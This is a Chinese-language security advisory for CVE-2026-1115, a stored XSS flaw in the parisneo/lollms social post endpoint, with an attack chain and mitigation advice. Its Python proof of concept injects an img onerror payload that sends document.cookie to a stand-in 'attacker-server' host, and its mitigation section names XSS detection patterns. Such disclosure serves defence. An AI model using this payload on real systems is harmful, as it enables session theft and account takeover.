IPBUF安全漏洞报告
English
CVE-2026-1115 CVSS 9.6 严重

CVE-2026-1115 parisneo/lollms存储型XSS漏洞

披露日期: 2026-04-10
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-1115
漏洞类型
存储型跨站脚本
CVSS评分
9.6 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
parisneo/lollms

相关标签

XSS存储型XSSWeb安全parisneolollmsCVE-2026-1115RCE

漏洞概述

parisneo/lollms社交功能中存在存储型XSS漏洞。攻击者通过`create_post`接口注入恶意脚本,未经过滤直接存储于数据库。当管理员或用户查看主页动态时,脚本自动执行,可导致账户劫持、会话窃取及蠕虫式传播。该漏洞影响2.2.0之前的所有版本。

技术细节

该漏洞源于`backend/routers/social/__init__.py`文件中的`create_post`函数未对用户提交的内容进行安全过滤。系统将用户输入直接赋值给`DBPost`模型并存入数据库。由于缺乏输入验证和输出编码,当其他用户访问包含恶意代码的主页动态时,浏览器会解析并执行该脚本。攻击者利用此漏洞可窃取Cookie、Session ID,甚至以管理员身份执行操作,造成严重的数据泄露和系统控制权丧失。

攻击链分析

STEP 1
步骤1:侦察
攻击者确认目标正在使用parisneo/lollms应用,且版本低于2.2.0。
STEP 2
步骤2:构造Payload
攻击者编写包含恶意JavaScript代码的HTML标签(如<img onerror=...>)或脚本标签。
STEP 3
步骤3:注入Payload
攻击者无需认证,直接向`create_post`接口发送POST请求,将恶意代码作为文章内容提交。
STEP 4
步骤4:存储与等待
服务器将未经过滤的恶意内容存储在数据库中,并显示在社交动态流中。
STEP 5
步骤5:触发执行
当管理员或普通用户访问主页动态时,浏览器加载并解析恶意代码,执行攻击者预设的脚本。
STEP 6
步骤6:利用后果
恶意脚本窃取受害者的Session Cookie,导致攻击者接管账户,或进一步蠕虫式传播攻击。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target API endpoint for creating a post target_url = "http://target-host/api/social/create_post" # Malicious XSS payload to steal cookies # Using <img> tag with onerror handler is a common bypass technique xss_payload = '<img src=x onerror=fetch(\'http://attacker-server/steal?c=\'+document.cookie)>' # Construct the payload data post_data = { "content": xss_payload, "title": "Interesting Post" } # Send the malicious request try: response = requests.post(target_url, json=post_data) if response.status_code == 200: print("[+] Payload injected successfully!") print("[+] Check the social feed to trigger the XSS.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

parisneo/lollms < 2.2.0

防御指南

临时缓解措施
在无法立即升级补丁的情况下,建议临时禁用社交功能模块。同时,应在Web应用防火墙(WAF)中部署规则,拦截检测到常见XSS特征(如<script>、javascript:、onerror=等字符)的HTTP请求。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表